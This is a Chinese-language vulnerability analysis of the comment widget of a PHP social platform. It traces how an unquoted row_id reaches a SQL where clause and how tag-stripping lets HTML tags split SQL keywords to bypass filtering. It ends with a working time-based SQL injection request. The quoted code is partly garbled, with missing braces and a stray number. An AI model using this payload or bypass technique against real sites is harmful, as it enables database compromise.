漏洞点出现在Comment Widget里:

* 添加评论的操作
* @return array 评论添加状态和提示信息
public function addcomment() {
// 返回结果集默认值
$return = array (
‘status‘ => 0,
// 获取接收数据
$data = $_POST;
// 安全过滤
foreach ( $data as $key => $val ) {
$data [$key] = t ( $data [$key] );
// 评论所属与评论内容
$data [‘app‘] = $data [‘app_name‘];
$data [‘table‘] = $data [‘table_name‘];
$data [‘content‘] = h ( $data [‘content‘] );
// 判断资源是否被删除
$dao = M ( $data [‘table‘] );
$idField = $dao->getPk ();
$map [$idField] = $data [‘row_id‘];
$sourceInfo = $dao->where ( $map )->find ();
if (! $sourceInfo) {2881064151
$return [‘status‘] = 0;
$return [‘data‘] = ‘内容已被删除,评论失败‘;
exit ( json_encode ( $return ) );
... ... ... ... ... ...
// 添加评论操作
$data [‘comment_id‘] = model ( ‘Comment‘ )->addComment ( $data );
if ($data [‘comment_id‘]) {
$return [‘status‘] = 1;
$return [‘data‘] = $this->parseComment ( $data );
// 同步到微吧
if ($data [‘app‘] == ‘weiba‘)$this->_upateToweiba ( $data );
... ... ... ... ...
$_POST经过$data [$key] = t( $data [$key] )后成为$data。
// 同步到微吧
if ($data [‘app‘] == ‘weiba‘)
$this->_upateToweiba ( $data );
// 同步到微吧
function _upateToweiba($data) {
$postDetail = D ( ‘weiba_post‘ )->where ( ‘feed_id=‘ . $data [‘row_id‘] )->find ();
if (! $postDetail)
return false;
... ... ... ... ...
$data[‘row_id‘]进入$postDetail = D ( ‘weiba_post‘ )->where ( ‘feed_id=‘ . $data [‘row_id‘] )->find (),两边没有单引号包围。
* t函数用于过滤标签,输出没有html的干净的文本
* @param string text 文本内容
* @return string 处理后内容
function t($text){
$text = nl2br($text);
$text = real_strip_tags($text);
$text = addslashes($text);
$text = trim($text);
return $text;
function real_strip_tags($str, $allowable_tags="") {
$str = html_entity_decode($str,ENT_QUOTES,‘UTF-8‘);
return strip_tags($str, $allowable_tags);
而real_strip_tags($text)里的strip_tags($str, $allowable_tags)会过滤掉tag,所以在SQL关键字中插入tag就能bypass waf,最后成为可以被利用的SQL注入。
POST /index.php?app=widget&mod=Comment&act=addcomment&uid=1
app_name=weiba&table_name=user&content=test&row_id=2 a<a>nd 0=sle<a>ep(2);-- -&app_detail_summary=

时间: 2024-08-17 05:10:53

